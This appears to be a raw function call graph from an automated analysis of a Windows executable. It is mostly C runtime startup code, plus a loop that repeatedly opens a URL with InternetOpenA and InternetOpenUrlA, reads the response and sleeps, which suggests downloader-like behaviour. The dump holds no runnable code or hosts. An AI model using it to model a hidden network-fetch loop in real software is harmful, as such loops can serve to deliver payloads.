19040->19046 19051 2ae3ae0 19040->19051 19042 2ae3d09 19043 2ae3ae0 __CRT_INIT@12 138 API calls 19042->19043 19042->19046 19043->19046 19044->19042 19045 2ae3ae0 __CRT_INIT@12 138 API calls 19044->19045 19044->19046 19045->19042 19046->19038 19048 2aeb844 19047->19048 19049 2aeb851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19047->19049 19048->19049 19050 2aeb848 19048->19050 19049->19050 19050->19035 19052 2ae3aec ___BuildCatchObject 19051->19052 19053 2ae3b6e 19052->19053 19054 2ae3af4 19052->19054 19056 2ae3bd7 19053->19056 19057 2ae3b72 19053->19057 19099 2ae8126 GetProcessHeap 19054->19099 19059 2ae3bdc 19056->19059 19060 2ae3c3a 19056->19060 19062 2ae3b93 19057->19062 19092 2ae3afd ___BuildCatchObject __CRT_INIT@12 19057->19092 19200 2ae839b 19057->19200 19058 2ae3af9 19058->19092 19100 2ae5cd4 19058->19100 19061 2ae910b __CRT_INIT@12 TlsGetValue 19059->19061 19060->19092 19231 2ae5b64 19060->19231 19065 2ae3be7 19061->19065 19203 2ae8272 RtlDecodePointer 19062->19203 19070 2ae89ac __calloc_crt 59 API calls 19065->19070 19065->19092 19068 2ae3b09 __RTC_Initialize 19076 2ae3b19 GetCommandLineA 19068->19076 19068->19092 19073 2ae3bf8 19070->19073 19071 2ae3ba9 __CRT_INIT@12 19227 2ae3bc2 19071->19227 19077 2ae912a __CRT_INIT@12 TlsSetValue 19073->19077 19073->19092 19074 2aeb4bf __ioterm 60 API calls 19075 2ae3ba4 19074->19075 19078 2ae5d4a __mtterm 62 API calls 19075->19078 19121 2aeb8bd GetEnvironmentStringsW 19076->19121 19081 2ae3c10 19077->19081 19078->19071 19083 2ae3c2e 19081->19083 19084 2ae3c16 19081->19084 19086 2ae2eb4 _free 59 API calls 19083->19086 19087 2ae5c21 __initptd 59 API calls 19084->19087 19085 2ae3b33 19089 2ae3b37 19085->19089 19153 2aeb511 19085->19153 19086->19092 19088 2ae3c1e GetCurrentThreadId 19087->19088 19088->19092 19186 2ae5d4a 19089->19186 19092->19044 19094 2ae3b57 19094->19092 19195 2aeb4bf 19094->19195 19099->19058 19239 2ae8442 RtlEncodePointer 19100->19239 19102 2ae5cd9 19244 2ae895e 19102->19244 19105 2ae5ce2 19106 2ae5d4a __mtterm 62 API calls 19105->19106 19108 2ae5ce7 19106->19108 19108->19068 19110 2ae5cff 19111 2ae89ac __calloc_crt 59 API calls 19110->19111 19112 2ae5d0c 19111->19112 19113 2ae5d41 19112->19113 19115 2ae912a __CRT_INIT@12 TlsSetValue 19112->19115 19114 2ae5d4a __mtterm 62 API calls 19113->19114 19117 2ae5d46 19114->19117 19116 2ae5d20 19115->19116 19116->19113 19118 2ae5d26 19116->19118 19117->19068 19119 2ae5c21 __initptd 59 API calls 19118->19119 19120 2ae5d2e GetCurrentThreadId 19119->19120 19120->19068 19122 2ae3b29 19121->19122 19123 2aeb8d0 WideCharToMultiByte 19121->19123 19134 2aeb20b 19122->19134 19125 2aeb93a FreeEnvironmentStringsW 19123->19125 19126 2aeb903 19123->19126 19125->19122 19127 2ae89f4 __malloc_crt 59 API calls 19126->19127 19128 2aeb909 19127->19128 19128->19125 19129 2aeb910 WideCharToMultiByte 19128->19129 19130 2aeb92f FreeEnvironmentStringsW 19129->19130 19131 2aeb926 19129->19131 19130->19122 19132 2ae2eb4 _free 59 API calls 19131->19132 19133 2aeb92c 19132->19133 19133->19130 19135 2aeb217 ___BuildCatchObject 19134->19135 19136 2ae882d __lock 59 API calls 19135->19136 19137 2aeb21e 19136->19137 19138 2ae89ac __calloc_crt 59 API calls 19137->19138 19140 2aeb22f 19138->19140 19139 2aeb29a GetStartupInfoW 19147 2aeb2af 19139->19147 19148 2aeb3de 19139->19148 19140->19139 19141 2aeb23a ___BuildCatchObject @_EH4_CallFilterFunc@8 19140->19141 19141->19085 19142 2aeb4a6 19252 2aeb4b6 19142->19252 19144 2ae89ac __calloc_crt 59 API calls 19144->19147 19145 2aeb42b GetStdHandle 19145->19148 19146 2aeb43e GetFileType 19146->19148 19147->19144 19147->19148 19149 2aeb2fd 19147->19149 19148->19142 19148->19145 19148->19146 19152 2ae914c __mtinitlocks InitializeCriticalSectionAndSpinCount 19148->19152 19149->19148 19150 2aeb331 GetFileType 19149->19150 19151 2ae914c __mtinitlocks InitializeCriticalSectionAndSpinCount 19149->19151 19150->19149 19151->19149 19152->19148 19154 2aeb51f 19153->19154 19155 2aeb524 GetModuleFileNameA 19153->19155 19262 2ae51ca 19154->19262 19157 2aeb551 19155->19157 19256 2aeb5c4 19157->19256 19160 2ae89f4 __malloc_crt 59 API calls 19161 2aeb58a 19160->19161 19162 2aeb5c4 _parse_cmdline 59 API calls 19161->19162 19163 2ae3b43 19161->19163 19162->19163 19163->19094 19164 2aeb740 19163->19164 19165 2aeb749 19164->19165 19169 2aeb74e _strlen 19164->19169 19187 2ae5d54 19186->19187 19192 2ae5d5a 19186->19192 19438 2ae90ec 19187->19438 19189 2ae8877 RtlDeleteCriticalSection 19191 2ae2eb4 _free 59 API calls 19189->19191 19190 2ae8893 19193 2ae889f RtlDeleteCriticalSection 19190->19193 19194 2ae88b2 19190->19194 19191->19192 19192->19189 19192->19190 19193->19190 19194->19092 19201 2ae84e4 _doexit 59 API calls 19200->19201 19202 2ae83a6 19201->19202 19202->19062 19204 2ae828c 19203->19204 19205 2ae829e 19203->19205 19204->19205 19207 2ae2eb4 _free 59 API calls 19204->19207 19206 2ae2eb4 _free 59 API calls 19205->19206 19208 2ae82ab 19206->19208 19207->19204 19209 2ae82cf 19208->19209 19212 2ae2eb4 _free 59 API calls 19208->19212 19210 2ae2eb4 _free 59 API calls 19209->19210 19211 2ae82db 19210->19211 19213 2ae2eb4 _free 59 API calls 19211->19213 19212->19208 19214 2ae82ec 19213->19214 19215 2ae2eb4 _free 59 API calls 19214->19215 19216 2ae82f7 19215->19216 19217 2ae831c RtlEncodePointer 19216->19217 19221 2ae2eb4 _free 59 API calls 19216->19221 19218 2ae8337 19217->19218 19219 2ae8331 19217->19219 19220 2ae834d 19218->19220 19223 2ae2eb4 _free 59 API calls 19218->19223 19222 2ae2eb4 _free 59 API calls 19219->19222 19224 2ae3b98 19220->19224 19226 2ae2eb4 _free 59 API calls 19220->19226 19225 2ae831b 19221->19225 19222->19218 19223->19220 19224->19071 19224->19074 19225->19217 19226->19224 19228 2ae3bc6 19227->19228 19229 2ae3bd4 19227->19229 19228->19229 19230 2ae5d4a __mtterm 62 API calls 19228->19230 19229->19092 19230->19229 19232 2ae5b71 19231->19232 19238 2ae5b97 19231->19238 19233 2ae5b7f 19232->19233 19234 2ae910b __CRT_INIT@12 TlsGetValue 19232->19234 19235 2ae912a __CRT_INIT@12 TlsSetValue 19233->19235 19234->19233 19236 2ae5b8f 19235->19236 19441 2ae5a2f 19236->19441 19238->19092 19240 2ae8453 __init_pointers __initp_misc_winsig 19239->19240 19251 2ae394a RtlEncodePointer 19240->19251 19242 2ae846b __init_pointers 19243 2ae91ba 34 API calls 19242->19243 19243->19102 19245 2ae896a 19244->19245 19246 2ae914c __mtinitlocks InitializeCriticalSectionAndSpinCount 19245->19246 19247 2ae5cde 19245->19247 19246->19245 19247->19105 19248 2ae90ce 19247->19248 19249 2ae5cf4 19248->19249 19250 2ae90e5 TlsAlloc 19248->19250 19249->19105 19249->19110 19251->19242 19255 2ae8997 RtlLeaveCriticalSection 19252->19255 19254 2aeb4bd 19254->19141 19255->19254 19258 2aeb5e6 19256->19258 19261 2aeb64a 19258->19261 19266 2af1516 19258->19266 19259 2aeb567 19259->19160 19259->19163 19260 2af1516 _parse_cmdline 59 API calls 19260->19261 19261->19259 19261->19260 19263 2ae51da 19262->19263 19264 2ae51d3 19262->19264 19263->19155 19322 2ae5527 19264->19322 19269 2af14bc 19266->19269 19272 2ae21bb 19269->19272 19273 2ae21cc 19272->19273 19279 2ae2219 19272->19279 19280 2ae5b9a 19273->19280 19279->19258 19323 2ae5533 ___BuildCatchObject 19322->19323 19324 2ae5b9a _strtok 59 API calls 19323->19324 19325 2ae553b 19324->19325 19326 2ae5481 __setmbcp 59 API calls 19325->19326 19327 2ae5545 19326->19327 19439 2ae90ff 19438->19439 19440 2ae9103 TlsFree 19438->19440 19439->19192 19440->19192 19442 2ae5a3b ___BuildCatchObject 19441->19442 19443 2ae5a54 19442->19443 19444 2ae2eb4 _free 59 API calls 19442->19444 19446 2ae5b43 ___BuildCatchObject 19442->19446 19445 2ae5a63 19443->19445 19447 2ae2eb4 _free 59 API calls 19443->19447 19444->19443 19448 2ae5a72 19445->19448 19449 2ae2eb4 _free 59 API calls 19445->19449 19446->19238 19447->19445 19450 2ae5a81 19448->19450 19452 2ae2eb4 _free 59 API calls 19448->19452 19449->19448 19451 2ae5a90 19450->19451 19453 2ae2eb4 _free 59 API calls 19450->19453 19454 2ae5a9f 19451->19454 19455 2ae2eb4 _free 59 API calls 19451->19455 19452->19450 19453->19451 19456 2ae5aae 19454->19456 19457 2ae2eb4 _free 59 API calls 19454->19457 19455->19454 19458 2ae5ac0 19456->19458 19460 2ae2eb4 _free 59 API calls 19456->19460 19457->19456 19459 2ae882d __lock 59 API calls 19458->19459 19462 2ae5ac8 19459->19462 19460->19458 19464 2ae2eb4 _free 59 API calls 19462->19464 19466 2ae5aeb 19462->19466 19464->19466 19465 2ae882d __lock 59 API calls 19471 2ae5aff ___removelocaleref 19465->19471 19473 2ae5b4f 19466->19473 19467 2ae5b30 19506 2ae5b5b 19467->19506 19470 2ae2eb4 _free 59 API calls 19470->19446 19471->19467 19476 2ae4f05 19471->19476 19509 2ae8997 RtlLeaveCriticalSection 19473->19509 19475 2ae5af8 19475->19465 19477 2ae4f1a 19476->19477 19478 2ae4f7e 19476->19478 19477->19478 19481 2ae4f4b 19477->19481 19488 2ae2eb4 _free 59 API calls 19477->19488 19479 2ae4fcb 19478->19479 19480 2ae2eb4 _free 59 API calls 19478->19480 19502 2ae4ff4 19479->19502 19550 2aed47d 19479->19550 19483 2ae4f9f 19480->19483 19485 2ae4f69 19481->19485 19495 2ae2eb4 _free 59 API calls 19481->19495 19486 2ae2eb4 _free 59 API calls 19483->19486 19487 2ae2eb4 _free 59 API calls 19485->19487 19491 2ae4fb2 19486->19491 19492 2ae4f73 19487->19492 19493 2ae4f40 19488->19493 19489 2ae2eb4 _free 59 API calls 19489->19502 19490 2ae5053 19494 2ae2eb4 _free 59 API calls 19490->19494 19496 2ae2eb4 _free 59 API calls 19491->19496 19497 2ae2eb4 _free 59 API calls 19492->19497 19510 2aed31a 19493->19510 19500 2ae5059 19494->19500 19501 2ae4f5e 19495->19501 19503 2ae4fc0 19496->19503 19497->19478 19498 2ae2eb4 59 API calls _free 19498->19502 19500->19467 19538 2aed416 19501->19538 19502->19490 19502->19498 19505 2ae2eb4 _free 59 API calls 19503->19505 19505->19479 19726 2ae8997 RtlLeaveCriticalSection 19506->19726 19508 2ae5b3d 19508->19470 19509->19475 19511 2aed329 19510->19511 19537 2aed412 19510->19537 19512 2aed33a 19511->19512 19514 2ae2eb4 _free 59 API calls 19511->19514 19513 2aed34c 19512->19513 19515 2ae2eb4 _free 59 API calls 19512->19515 19516 2ae2eb4 _free 59 API calls 19513->19516 19517 2aed35e 19513->19517 19514->19512 19515->19513 19516->19517 19518 2aed370 19517->19518 19519 2ae2eb4 _free 59 API calls 19517->19519 19520 2aed382 19518->19520 19522 2ae2eb4 _free 59 API calls 19518->19522 19519->19518 19521 2aed394 19520->19521 19523 2ae2eb4 _free 59 API calls 19520->19523 19522->19520 19523->19521 19537->19481 19539 2aed421 19538->19539 19549 2aed479 19538->19549 19540 2aed431 19539->19540 19541 2ae2eb4 _free 59 API calls 19539->19541 19542 2aed443 19540->19542 19543 2ae2eb4 _free 59 API calls 19540->19543 19541->19540 19544 2aed455 19542->19544 19545 2ae2eb4 _free 59 API calls 19542->19545 19543->19542 19546 2aed467 19544->19546 19547 2ae2eb4 _free 59 API calls 19544->19547 19545->19544 19548 2ae2eb4 _free 59 API calls 19546->19548 19546->19549 19547->19546 19548->19549 19549->19485 19551 2aed48c 19550->19551 19552 2ae4fe9 19550->19552 19553 2ae2eb4 _free 59 API calls 19551->19553 19552->19489 19554 2aed494 19553->19554 19555 2ae2eb4 _free 59 API calls 19554->19555 19556 2aed49c 19555->19556 19557 2ae2eb4 _free 59 API calls 19556->19557 19558 2aed4a4 19557->19558 19559 2ae2eb4 _free 59 API calls 19558->19559 19726->19508 19727 402f22 GetVersion 19751 40325a HeapCreate 19727->19751 19729 402f81 19730 402f86 19729->19730 19731 402f8e 19729->19731 19826 40303d 19730->19826 19763 404842 19731->19763 19735 402f96 GetCommandLineA 19777 404710 19735->19777 19739 402fb0 19809 40440a 19739->19809 19741 402fb5 19742 402fba GetStartupInfoA 19741->19742 19822 4043b2 19742->19822 19744 402fcc GetModuleHandleA 19746 402ff0 19744->19746 19832 404159 19746->19832 19752 4032b0 19751->19752 19753 40327a 19751->19753 19752->19729 19839 403112 19753->19839 19756 403289 19851 4032b7 HeapAlloc 19756->19851 19758 4032b3 19758->19729 19759 403296 19759->19758 19853 403b08 19759->19853 19760 403293 19760->19758 19762 4032a4 HeapDestroy 19760->19762 19762->19752 19916 402e70 19763->19916 19766 404861 GetStartupInfoA 19774 404972 19766->19774 19776 4048ad 19766->19776 19769 4049d9 SetHandleCount 19769->19735 19770 404999 GetStdHandle 19772 4049a7 GetFileType 19770->19772 19770->19774 19771 402e70 12 API calls 19771->19776 19772->19774 19773 40491e 19773->19774 19775 404940 GetFileType 19773->19775 19774->19769 19774->19770 19775->19773 19776->19771 19776->19773 19776->19774 19778 40472b GetEnvironmentStringsW 19777->19778 19779 40475e 19777->19779 19780 404733 19778->19780 19781 40473f GetEnvironmentStrings 19778->19781 19779->19780 19782 40474f 19779->19782 19784 404777 WideCharToMultiByte 19780->19784 19785 40476b GetEnvironmentStringsW 19780->19785 19781->19782 19783 402fa6 19781->19783 19782->19783 19786 4047f1 GetEnvironmentStrings 19782->19786 19787 4047fd 19782->19787 19800 4044c3 19783->19800 19789 4047ab 19784->19789 19790 4047dd FreeEnvironmentStringsW 19784->19790 19785->19783 19785->19784 19786->19783 19786->19787 19791 402e70 12 API calls 19787->19791 19792 402e70 12 API calls 19789->19792 19790->19783 19794 404818 19791->19794 19793 4047b1 19792->19793 19793->19790 19795 4047ba WideCharToMultiByte 19793->19795 19796 40482e FreeEnvironmentStringsA 19794->19796 19797 4047d4 19795->19797 19798 4047cb 19795->19798 19796->19783 19797->19790 19982 403061 19798->19982 19801 4044d5 19800->19801 19802 4044da GetModuleFileNameA 19800->19802 20012 40583b 19801->20012 19804 4044fd 19802->19804 19805 402e70 12 API calls 19804->19805 19806 40451e 19805->19806 19807 40452e 19806->19807 19808 403018 7 API calls 19806->19808 19807->19739 19808->19807 19810 404417 19809->19810 19813 40441c 19809->19813 19811 40583b 19 API calls 19810->19811 19811->19813 19812 402e70 12 API calls 19814 404449 19812->19814 19813->19812 19815 403018 7 API calls 19814->19815 19821 40445d 19814->19821 19815->19821 19816 4044a0 19817 403061 7 API calls 19816->19817 19818 4044ac 19817->19818 19818->19741 19819 402e70 12 API calls 19819->19821 19820 403018 7 API calls 19820->19821 19821->19816 19821->19819 19821->19820 19823 4043bb 19822->19823 19825 4043c0 19822->19825 19824 40583b 19 API calls 19823->19824 19824->19825 19825->19744 19827 403046 19826->19827 19828 40304b 19826->19828 19829 404bc0 7 API calls 19827->19829 19830 404bf9 7 API calls 19828->19830 19829->19828 19831 403054 ExitProcess 19830->19831 20036 40417b 19832->20036 19835 40422e 19836 40423a 19835->19836 19837 404363 UnhandledExceptionFilter 19836->19837 19838 40300a 19836->19838 19837->19838 19862 402d50 19839->19862 19842 403155 GetEnvironmentVariableA 19844 403232 19842->19844 19847 403174 19842->19847 19843 40313b 19843->19842 19846 40314d 19843->19846 19844->19846 19867 4030e5 GetModuleHandleA 19844->19867 19846->19756 19846->19759 19848 4031b9 GetModuleFileNameA 19847->19848 19849 4031b1 19847->19849 19848->19849 19849->19844 19864 404d4c 19849->19864 19852 4032d3 19851->19852 19852->19760 19854 403b15 19853->19854 19855 403b1c HeapAlloc 19853->19855 19856 403b39 VirtualAlloc 19854->19856 19855->19856 19861 403b71 19855->19861 19857 403b59 VirtualAlloc 19856->19857 19858 403c2e 19856->19858 19859 403c20 VirtualFree 19857->19859 19857->19861 19860 403c36 HeapFree 19858->19860 19858->19861 19859->19858 19860->19861 19861->19760 19863 402d5c GetVersionExA 19862->19863 19863->19842 19863->19843 19869 404d63 19864->19869 19868 4030fc 19867->19868 19868->19846 19871 404d7b 19869->19871 19872 404dab 19871->19872 19876 405aaa 19871->19876 19873 405aaa 6 API calls 19872->19873 19875 404d5f 19872->19875 19880 4059de 19872->19880 19873->19872 19875->19844 19877 405ac8 19876->19877 19878 405abc 19876->19878 19886 405d6e 19877->19886 19878->19871 19881 405a09 19880->19881 19885 4059ec 19880->19885 19882 405a25 19881->19882 19883 405aaa 6 API calls 19881->19883 19882->19885 19898 405b1f 19882->19898 19883->19882 19885->19872 19887 405db7 19886->19887 19888 405d9f GetStringTypeW 19886->19888 19890 405de2 GetStringTypeA 19887->19890 19891 405e06 19887->19891 19888->19887 19889 405dbb GetStringTypeA 19888->19889 19889->19887 19892 405ea3 19889->19892 19890->19892 19891->19892 19894 405e1c MultiByteToWideChar 19891->19894 19892->19878 19894->19892 19895 405e40 19894->19895 19895->19892 19896 405e7a MultiByteToWideChar 19895->19896 19896->19892 19897 405e93 GetStringTypeW 19896->19897 19897->19892 19899 405b6b 19898->19899 19900 405b4f LCMapStringW 19898->19900 19903 405bd1 19899->19903 19904 405bb4 LCMapStringA 19899->19904 19900->19899 19901 405b73 LCMapStringA 19900->19901 19901->19899 19902 405cad 19901->19902 19902->19885 19903->19902 19905 405be7 MultiByteToWideChar 19903->19905 19904->19902 19905->19902 19906 405c11 19905->19906 19906->19902 19907 405c47 MultiByteToWideChar 19906->19907 19907->19902 19908 405c60 LCMapStringW 19907->19908 19908->19902 19909 405c7b 19908->19909 19910 405c81 19909->19910 19912 405cc1 19909->19912 19910->19902 19911 405c8f LCMapStringW 19910->19911 19911->19902 19912->19902 19913 405cf9 LCMapStringW 19912->19913 19913->19902 19914 405d11 WideCharToMultiByte 19913->19914 19914->19902 19925 402e82 19916->19925 19919 403018 19920 403021 19919->19920 19921 403026 19919->19921 19962 404bc0 19920->19962 19968 404bf9 19921->19968 19926 402e7f 19925->19926 19928 402e89 19925->19928 19926->19766 19926->19919 19928->19926 19929 402eae 19928->19929 19930 402ebd 19929->19930 19932 402ed2 19929->19932 19937 402ecb 19930->19937 19938 403653 19930->19938 19933 402f11 HeapAlloc 19932->19933 19932->19937 19944 403e00 19932->19944 19934 402f20 19933->19934 19934->19928 19935 402ed0 19935->19928 19937->19933 19937->19934 19937->19935 19939 403685 19938->19939 19940 403724 19939->19940 19942 403733 19939->19942 19951 40395c 19939->19951 19940->19942 19958 403a0d 19940->19958 19942->19937 19949 403e0e 19944->19949 19945 403efa VirtualAlloc 19950 403ecb 19945->19950 19946 403fcf 19947 403b08 5 API calls 19946->19947 19947->19950 19949->19945 19949->19946 19949->19950 19950->19937 19952 40399f HeapAlloc 19951->19952 19953 40396f HeapReAlloc 19951->19953 19955 4039ef 19952->19955 19956 4039c5 VirtualAlloc 19952->19956 19954 40398e 19953->19954 19953->19955 19954->19952 19955->19940 19956->19955 19957 4039df HeapFree 19956->19957 19957->19955 19959 403a1f VirtualAlloc 19958->19959 19961 403a68 19959->19961 19961->19942 19964 404bca 19962->19964 19963 404bf7 19963->19921 19964->19963 19965 404bf9 7 API calls 19964->19965 19966 404be1 19965->19966 19967 404bf9 7 API calls 19966->19967 19967->19963 19970 404c0c 19968->19970 19969 404d23 19972 404d36 GetStdHandle WriteFile 19969->19972 19970->19969 19971 404c4c 19970->19971 19976 40302f 19970->19976 19973 404c58 GetModuleFileNameA 19971->19973 19971->19976 19972->19976 19974 404c70 19973->19974 19977 405857 19974->19977 19976->19766 19978 405864 LoadLibraryA 19977->19978 19980 4058a6 19977->19980 19979 405875 GetProcAddress 19978->19979 19978->19980 19979->19980 19981 40588c GetProcAddress GetProcAddress 19979->19981 19980->19976 19981->19980 19983 403089 19982->19983 19984 40306d 19982->19984 19983->19797 19985 403077 19984->19985 19986 40308d 19984->19986 19988 4030b9 HeapFree 19985->19988 19989 403083 19985->19989 19987 4030b8 19986->19987 19991 4030a7 19986->19991 19987->19988 19988->19983 19993 40332a 19989->19993 19999 403dbb 19991->19999 19995 403368 19993->19995 19998 40361e 19993->19998 19994 403564 VirtualFree 19996 4035c8 19994->19996 19995->19994 19995->19998 19997 4035d7 VirtualFree HeapFree 19996->19997 19996->19998 19997->19998 19998->19983 20000 403de8 19999->20000 20001 403dfe 19999->20001 20000->20001 20003 403ca2 20000->20003 20001->19983 20006 403caf 20003->20006 20004 403d5f 20004->20001 20005 403cd0 VirtualFree 20005->20006 20006->20004 20006->20005 20008 403c4c VirtualFree 20006->20008 20009 403c69 20008->20009 20010 403c99 20009->20010 20011 403c79 HeapFree 20009->20011 20010->20006 20011->20006 20013 405844 20012->20013 20015 40584b 20012->20015 20016 405477 20013->20016 20015->19802 20023 405610 20016->20023 20020 4054ba GetCPInfo 20022 4054ce 20020->20022 20021 405604 20021->20015 20022->20021 20028 4056b6 GetCPInfo 20022->20028 20024 405630 20023->20024 20025 405620 GetOEMCP 20023->20025 20026 405488 20024->20026 20027 405635 GetACP 20024->20027 20025->20024 20026->20020 20026->20021 20026->20022 20027->20026 20029 4057a1 20028->20029 20030 4056d9 20028->20030 20029->20021 20031 405d6e 6 API calls 20030->20031 20032 405755 20031->20032 20033 405b1f 9 API calls 20032->20033 20034 405779 20033->20034 20035 405b1f 9 API calls 20034->20035 20035->20029 20037 404187 GetCurrentProcess TerminateProcess 20036->20037 20038 404198 20036->20038 20037->20038 20039 402ff9 20038->20039 20040 404202 ExitProcess 20038->20040 20039->19835 20041 402223 20043 40b055 20041->20043 20042 4022ba 20043->20042 20045 401f64 FindResourceA 20043->20045 20046 401f86 GetLastError SizeofResource 20045->20046 20047 401f9f 20045->20047 20046->20047 20048 401fa6 LoadResource LockResource GlobalAlloc 20046->20048 20047->20042 20049 401fd2 20048->20049 20050 401ffb GetTickCount 20049->20050 20052 402005 GlobalAlloc 20050->20052 20052->20047 20053 2b3a835 20054 2b3e3b9 20053->20054 20056 2ae2eec 59 API calls 20054->20056 20055 2b3e3be 20057 2ae2eec 59 API calls 20055->20057 20056->20055 20057->20055 20058 2ad72a7 InternetOpenA 20059 2ad72c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 20058->20059 20093 2ad66f0 _memset shared_ptr 20058->20093 20065 2ad733e _memset 20059->20065 20060 2ad731e InternetOpenUrlA 20061 2ad737e InternetCloseHandle 20060->20061 20060->20065 20061->20093 20062 2ad6704 Sleep 20064 2ad670a RtlEnterCriticalSection RtlLeaveCriticalSection 20062->20064 20063 2ad7342 InternetReadFile 20063->20065 20066 2ad7373 InternetCloseHandle 20063->20066 20064->20093 20065->20060 20065->20063 20066->20061 20067 2ad73e5 RtlEnterCriticalSection RtlLeaveCriticalSection 20169 2ae227c 20067->20169 20069 2ae227c 66 API calls 20069->20093 20070 2ae2eec _malloc 59 API calls 20071 2ad7499 RtlEnterCriticalSection RtlLeaveCriticalSection 20070->20071 20071->20093 20072 2ad7766 RtlEnterCriticalSection RtlLeaveCriticalSection 20072->20093 20074 2ae2eec 59 API calls _malloc 20074->20093 20077 2ad78de RtlEnterCriticalSection 20078 2ad790b RtlLeaveCriticalSection 20077->20078 20077->20093 20229 2ad3c67 20078->20229 20083 2ae2eb4 59 API calls _free 20083->20093 20085 2ada658 73 API calls 20085->20093 20092 2ae3529 60 API calls _strtok 20092->20093 20093->20058 20093->20062 20093->20064 20093->20067 20093->20069 20093->20070 20093->20072 20093->20074 20093->20077 20093->20078 20093->20083 20093->20085 20093->20092 20093->20093 20097 2ad76e8 Sleep 20093->20097 20098 2ad76e3 shared_ptr 20093->20098 20101 2ad5119 20093->20101 20130 2adab42 20093->20130 20140 2ad61f1 20093->20140 20143 2ad826e 20093->20143 20149 2add04a 20093->20149 20154 2ad831d 20093->20154 20162 2ad33b2 20093->20162 20179 2ae2790 20093->20179 20182 2ae3a8f 20093->20182 20190 2ad966a 20093->20190 20197 2ada782 20093->20197 20205 2ad4100 20093->20205 20209 2ae2358 20093->20209 20220 2ad1ba7 20093->20220 20236 2ad3d7e 20093->20236 20243 2ad8f36 20093->20243 20250 2ad534d 20093->20250 20201 2ae1830 20097->20201 20098->20097 20102 2ad5123 __EH_prolog 20101->20102 20260 2ae0a50 20102->20260 20105 2ad3c67 72 API calls 20106 2ad514a 20105->20106 20107 2ad3d7e 64 API calls 20106->20107 20108 2ad5158 20107->20108 20109 2ad826e 89 API calls 20108->20109 20110 2ad516c 20109->20110 20111 2ad5322 shared_ptr 20110->20111 20264 2ada658 20110->20264 20111->20093 20114 2ad51c4 20116 2ada658 73 API calls 20114->20116 20115 2ad51f6 20117 2ada658 73 API calls 20115->20117 20119 2ad51d4 20116->20119 20118 2ad5207 20117->20118 20118->20111 20120 2ada658 73 API calls 20118->20120 20119->20111 20122 2ada658 73 API calls 20119->20122 20121 2ad524a 20120->20121 20121->20111 20124 2ada658 73 API calls 20121->20124 20123 2ad52b4 20122->20123 20123->20111 20125 2ada658 73 API calls 20123->20125 20124->20119 20126 2ad52da 20125->20126 20126->20111 20127 2ada658 73 API calls 20126->20127 20128 2ad5304 20127->20128 20269 2adce0c 20128->20269 20131 2adab4c __EH_prolog 20130->20131 20320 2add021 20131->20320 20133 2adab6d shared_ptr 20323 2ae2030 20133->20323 20135 2adab84 20136 2adab9a 20135->20136 20329 2ad3fb0 20135->20329 20136->20093 20141 2ae2eec _malloc 59 API calls 20140->20141 20142 2ad6204 20141->20142 20144 2ad8286 20143->20144 20145 2ad82a7 20143->20145 20775 2ad9530 20144->20775 20148 2ad82cc 20145->20148 20778 2ad2ac7 20145->20778 20148->20093 20150 2ae0a50 Mailbox 68 API calls 20149->20150 20152 2add060 20150->20152 20151 2add14e 20151->20093 20152->20151 20153 2ad2db5 73 API calls 20152->20153 20153->20152 20155 2ad8338 WSASetLastError shutdown 20154->20155 20156 2ad8328 20154->20156 20158 2ada43c 69 API calls 20155->20158 20157 2ae0a50 Mailbox 68 API calls 20156->20157 20161 2ad832d 20157->20161 20159 2ad8355 20158->20159 20160 2ae0a50 Mailbox 68 API calls 20159->20160 20159->20161 20160->20161 20161->20093 20163 2ad33c4 InterlockedCompareExchange 20162->20163 20164 2ad33e1 20162->20164 20163->20164 20165 2ad33d6 20163->20165 20166 2ad29ee 76 API calls 20164->20166 20872 2ad32ab 20165->20872 20168 2ad33f1 20166->20168 20168->20093 20170 2ae2288 20169->20170 20171 2ae22ab 20169->20171 20170->20171 20172 2ae228e 20170->20172 20925 2ae22c3 20171->20925 20174 2ae5d9b __read_nolock 59 API calls 20172->20174 20176 2ae2293 20174->20176 20175 2ae22be 20175->20093 20177 2ae4e35 __read_nolock 9 API calls 20176->20177 20178 2ae229e 20177->20178 20178->20093 20935 2ae27ae 20179->20935 20181 2ae27a9 20181->20093 20183 2ae3a97 20182->20183 20184 2ae2eec _malloc 59 API calls 20183->20184 20185 2ae3ab1 20183->20185 20186 2ae8143 _malloc RtlDecodePointer 20183->20186 20187 2ae3ab5 std::exception::exception 20183->20187 20184->20183 20185->20093 20186->20183 20188 2ae449a __CxxThrowException@8 RaiseException 20187->20188 20189 2ae3adf 20188->20189 20191 2ad9674 __EH_prolog 20190->20191 20192 2ad1ba7 210 API calls 20191->20192 20193 2ad96c9 20192->20193 20194 2ad96e6 RtlEnterCriticalSection 20193->20194 20195 2ad9704 RtlLeaveCriticalSection 20194->20195 20196 2ad9701 20194->20196 20195->20093 20196->20195 20198 2ada78c __EH_prolog 20197->20198 20941 2addf33 20198->20941 20200 2ada7aa shared_ptr 20200->20093 20202 2ae183d 20201->20202 20203 2ae1861 20201->20203 20202->20203 20204 2ae1851 GetProcessHeap HeapFree 20202->20204 20203->20093 20204->20203 20206 2ad4118 20205->20206 20207 2ad4112 20205->20207 20206->20093 20945 2ada636 20207->20945 20210 2ae2389 20209->20210 20211 2ae2374 20209->20211 20210->20211 20213 2ae2390 20210->20213 20212 2ae5d9b __read_nolock 59 API calls 20211->20212 20214 2ae2379 20212->20214 20947 2ae5f90 20213->20947 20216 2ae4e35 __read_nolock 9 API calls 20214->20216 20218 2ae2384 20216->20218 20218->20093 21172 2af5330 20220->21172 20222 2ad1bb1 RtlEnterCriticalSection 20223 2ad1be9 RtlLeaveCriticalSection 20222->20223 20224 2ad1bd1 20222->20224 21173 2ade263 20223->21173 20224->20223 20226 2ad1c55 RtlLeaveCriticalSection 20224->20226 20226->20093 20227 2ad1c22 20227->20226 20230 2ae0a50 Mailbox 68 API calls 20229->20230 20231 2ad3c7e 20230->20231 21255 2ad3ca2 20231->21255 20237 2ad3d99 htons 20236->20237 20238 2ad3dcb htons 20236->20238 21282 2ad3bd3 20237->21282 21288 2ad3c16 20238->21288 20242 2ad3ded 20242->20093 20244 2ad8f40 __EH_prolog 20243->20244 21319 2ad373f 20244->21319 20246 2ad8f5a RtlEnterCriticalSection 20247 2ad8f69 RtlLeaveCriticalSection 20246->20247 20249 2ad8fa3 20247->20249 20249->20093 20251 2ae2eec _malloc 59 API calls 20250->20251 20252 2ad5362 SHGetSpecialFolderPathA 20251->20252 20253 2ad5378 20252->20253 21328 2ae36b4 20253->21328 20257 2ad53dc 21344 2ae39c7 20257->21344 20259 2ad53e2 